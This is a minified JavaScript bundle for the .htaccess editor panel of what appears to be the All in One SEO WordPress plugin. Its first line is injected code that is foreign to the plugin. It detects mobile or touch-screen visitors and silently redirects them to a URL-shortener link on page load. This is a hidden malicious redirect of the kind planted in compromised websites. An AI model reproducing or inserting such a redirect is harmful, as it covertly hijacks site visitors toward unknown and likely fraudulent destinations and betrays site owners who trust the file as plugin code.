(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as _,y as f}from"./app-core.c8323d51.js";import{B as h}from"./Editor.7ff35261.js";import{C as g}from"./Index.b9859662.js";import{C as y}from"./Card.9ee06a3e.js";import{C as w}from"./SettingsRow.7bec777f.js";import{_ as b}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as o,f as c,i as v,a0 as s,R as r,j as C,Q as S,ae as k,U as x,M as E}from"./vendor-vue-ui.232c7c36.js";import{a as B,_ as a}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Pencil.683baab8.js";import"./Trash.47f6fc0e.js";import"./Caret.aae02d8a.js";import"./Close.7fb523c8.js";import"./Tooltip.569a23d9.js";import"./Slide.f2114d9d.js";import"./Row.2ef96b1a.js";const n="all-in-one-seo-pack",V={setup(){return{optionsStore:f(),rootStore:_()}},components:{BaseEditor:h,CoreAlert:g,CoreCard:y,CoreSettingsRow:w},data(){return{strings:{htaccessEditor:a(".htaccess Editor",n),editHtaccess:a("Edit .htaccess",n),description:B(a("This allows you to edit the .htaccess file for your site. All WordPress sites on an Apache server have a .htaccess file and we have provided you with a convenient way of editing it. Care should always be taken when editing important files from within WordPress as an incorrect change could cause WordPress to become inaccessible. %1$sBe sure to make a backup before making changes and ensure that you have FTP access to your web server and know how to access and edit files via FTP.%2$s",n),"<strong>","</strong>")}}}},A={class:"aioseo-tools-htaccess-editor"},H=["innerHTML"];function P(T,i,L,e,t,N){const l=o("core-alert"),d=o("base-editor"),p=o("core-settings-row"),m=o("core-card");return c(),v("div",A,[s(m,{slug:"htaccessEditor","header-text":t.strings.htaccessEditor},{default:r(()=>[C("div",{class:"aioseo-settings-row aioseo-section-description",innerHTML:t.strings.description},null,8,H),s(p,{name:t.strings.editHtaccess,align:""},{content:r(()=>[e.optionsStore.htaccessError?(c(),S(l,{key:0,type:"red"},{default:r(()=>[k(x(e.optionsStore.htaccessError),1)]),_:1})):E("",!0),s(d,{class:"htaccess-editor",disabled:!e.rootStore.aioseo.user.unfilteredHtml,modelValue:e.rootStore.aioseo.data.htaccess,"onUpdate:modelValue":i[0]||(i[0]=u=>e.rootStore.aioseo.data.htaccess=u),"line-numbers":"",monospace:"","preserve-whitespace":""},null,8,["disabled","modelValue"])]),_:1},8,["name"])]),_:1},8,["header-text"])])}const $=b(V,[["render",P]]);export{$ as default};
